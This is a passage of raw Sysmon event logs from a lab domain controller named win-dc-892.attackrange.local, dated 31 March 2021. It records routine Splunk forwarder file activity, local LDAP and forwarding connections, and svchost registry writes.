Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FFD3F8DBCB80F68473964475C4F7CE9,SHA256=8E12F95C4C7F3E383E93198C79C884BEB4EAD649B73700C51FFCD15BECEF7F7C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009674Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.588{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53638-false10.0.1.12-8000- 354300x80000000000000009673Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.494{266CAFBE-646A-6064-0B00-00000000AE01}856C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53637-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 
354300x80000000000000009672Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:14.494{266CAFBE-647D-6064-3000-00000000AE01}2648C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53637-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local389ldap 23542300x80000000000000009671Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:15.270{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDFCDCE1A1750F6145BA305234E0FB10,SHA256=86FD97E5C901C6518D69E2ED96FDADBCBF5DC7A85E102B159A8A96C6DB33A92B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009670Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:15.161{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29BDB57A9B7A54AE4C07D04A54FB1B35,SHA256=F00088AD44F748056E30132EE906936A4F0DC0E88978BCF3A913A3D5C78037BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009669Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:15.161{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5B4659CB694CF1A97B68FF2BCD7190ED,SHA256=86EAED2E96E7393CCE279FC5AB4460947963C219A6B2674C7917A7D02C2AC733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009675Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:16.285{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C5C2E0FD01FF4F7F27E377D7B32698AA,SHA256=55613697469BE4B3A933E744D4B4C8546E35B5D097412142124312831558E984,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009677Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:17.300{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2783E7929321355F5401A68FB7F2B7A,SHA256=B0F8EABEA7184D82AFED0F408C2F887E34A965B1EEBFF9296313BBD6596181C8,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009676Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:17.019{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x1d237183) 23542300x80000000000000009678Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:18.346{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ED4AB46919972253208122FCFCEBDEB,SHA256=D4691041D040E7941BAD320F36501B3268EEF632488B9C2F8CBE9555776AF195,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009679Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:19.346{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A639749FFDA50E37ACE69C25C1A46BAB,SHA256=29C52859594A80946BC30ED5F19FBF55E641E3B4DF72D221146FB498349A691A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009680Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:20.392{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CD27D23173A2F9C9B5989E1AEF488B4,SHA256=5312F6F39D478822A5C406BB9028DE02AC5AE46509D464EAFFCEE834C401DCAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:20.541{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53639-false10.0.1.12-8000- 23542300x80000000000000009681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:21.439{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C153B351CC5C307B6A7ED7F7CDFE736,SHA256=47ED888048DB28CD6D978F9B96FBFE762500357E5856883863052F2BA6974E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:22.501{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=763E34DC2C7FC6B51C74585AB320E041,SHA256=D37F4F866A59E8C149AE0B237919AF5198933F634D1E142C720A25632ED2DAE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:23.516{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B8D32B733C794D7D20363DADAA3E7E5,SHA256=400B581FC2D7344CD41CD154855C57216F95392AD36325BA305C2347A6B205B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:24.547{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4EFFA93A92F3262E8863B9DC1BE371,SHA256=55C81B0EB0F0FDC780FA58D0BD708FC9BB9E0AE008B6BA860A336F332F5D6C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:25.656{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B008149496AAD6B8B3F11A44FE42698E,SHA256=6F582F1B189A425587E8DA2AE0F39B93DAAECBE69D4510BE6CCA0625915EE7C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:26.686{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DA38211032DB7A806D8DE94F496F977,SHA256=CCF3E22E7D43FD92C481FB9C012A0DEC8B84367377F1F5C2DD85950072BDCC9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:26.494{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53640-false10.0.1.12-8000- 23542300x80000000000000009688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:27.717{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D14C2B5B5DB9FEAB4C3A969911EC1D9,SHA256=5E7940B9216E373939120E8CF30EBB8C195DA04C7ACF0CADF62D4952E5D820F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:28.733{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31C72660B5D00B665B88900033689DDD,SHA256=D49747BB93BACD51D6588421BCB90933214F0D5B49E3990C8ABA8B5E9633EF2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:29.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58C3D50FDCC09A976A2B73B92371D5EA,SHA256=899A3BF8284D844BD8843FFF1263AE687FB3A864A806855294618F80F234C5BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:29.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29BDB57A9B7A54AE4C07D04A54FB1B35,SHA256=F00088AD44F748056E30132EE906936A4F0DC0E88978BCF3A913A3D5C78037BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:29.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F5E8461965B3BAA4B29A516CF9A9B4,SHA256=F50E6F55F9C619B8B7B5C031ED73C185A1D357CB91C8813909AF11FBB40B54F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:30.763{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86D3ED2C44633090D4DC3C92B262B557,SHA256=1714BF2849F79B309D38D911BB6F9E91EF56BE287EFC0AFE83B03C499C0DB57A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:31.778{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D3EEF9510C4DD95EF4574B6EEF8F3A0,SHA256=FC32C129C61FFBB719501D2D198CE22F17833436D1421595E9695B91AC3F0E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:32.778{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E478B5C715C7F6C454557C179192B96,SHA256=1DF97FEAD7F00F3823DDDD1F6FCA21E3D8DD1A72D95518F3207C754C36BAA064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:33.793{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08ED64A01AE95F95E250957217CE3C27,SHA256=0352A2399DA9FEA1B84CF3141949467183AF01C0B5821766C1BDB683205265A4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x80000000000000009702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 
13241300x80000000000000009701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x80000000000000009700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d72626-0x26d6baea) 13241300x80000000000000009699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x80000000000000009698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 13241300x80000000000000009697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.012{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x26abd8b9) 23542300x80000000000000009708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:34.793{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FC94CC27B57F668CE57AC5F5F542EC,SHA256=E66F966618C4FE9BFF90885D156CCB612BDC00986A8828961B5993708D4514F5,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000009707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:34.590{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C7473592ABE08110688B66C5673E6FE5,SHA256=7693F93F526BBA7A83C694299B80E718F80C9D594B6E7F2F9E333ACC1262F1CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:34.590{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=10504BD7EABA3CD3DB7C24480501F02E,SHA256=3717E0FA171342C099209476060CACE0D1A124F4FE88E7ECA9902680651AADC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:32.447{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53641-false10.0.1.12-8000- 23542300x80000000000000009709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:35.808{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2FA612F6E97522248B728DBE521B1F0,SHA256=E86360DDA3639BC9900A26279424993ED0DCF17F948C272F2F90910346A7C271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:36.808{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3495854E175D23DBCC6060CD57E492D5,SHA256=9A6EAE6B3DE033C81566E889917214A7016B94BDDE01123C0318C6F1C2C5623F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:37.823{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39268CE1A543DC80AE37041825985138,SHA256=230D52017C30E057D68E2371C33BEEEAE063D113AEC19618F3F2B80EC9D5B5D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:38.823{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF115B7EBDE874122D63E911E91F1D4,SHA256=4E7718D822F83F5AA90D9DA1015EDC458D6F2608ADDB92AB19A6E402290A9672,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:37.603{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53642-false10.0.1.12-8000- 23542300x80000000000000009714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:39.838{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9B46EDBBA54541F21383D822EAE07A8,SHA256=9520A95D8F458E7E26624624A39CAF6AC1B8F416E7AA2E9850C7ADAE3F713D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:40.853{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=066F600E9A776E8DA9506F0FFD00EFFD,SHA256=BF9441D3ED040B69A9842EC581B61B54BEC1529208C7C9643E16DE91B66548EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:41.868{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B28D72F4CF753DE6CC147C852B25BA,SHA256=8329DA1808446FCFDECAABCFED7A42AEF3DF48B8135D335BDFF4B456C920DCC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:42.962{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E51560233504B8FD1030BC6584D00B6D,SHA256=0504D200096D4700A11EBEED459725F0A65E6F4F0151C4C55D3BF8806F7F2E5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:05:43.992{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE0885A1405302FA0B0E82D97059C23,SHA256=821553314FA7B2056988A5737E5AF7DDE07070E5CD41B8F6B6D6EF12C21D2C12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:43.556{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53643-false10.0.1.12-8000- 11241100x80000000000000009720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x80000000000000009719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7A578EFB7C9FA76B652910F1CDE5FFDD,SHA256=2F4257769B27ACCA4A94346D6CFC3394CDA9868C86EDC54A8C62D9757E1F8777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:45.086{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB72222CCF368D6F6B0C4E9143BB2231,SHA256=1C65D2E81CB1B58148E0CFF232C051AF3929C6158874D310E3CBCAAB0EE648CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:46.101{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE6530F90E0C7526F3C1369C232345A6,SHA256=D9C6214FBFA9C4C6866260DEA71931B0C7282ECC588B57FF856F132AAD53EB93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:47.116{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0F41DF1A33EFB454D1EA680688FEE3,SHA256=BE65A499D9D010355BC411EFBBA7321AA79C86CB4953B357D52406E274F56F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.866{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program 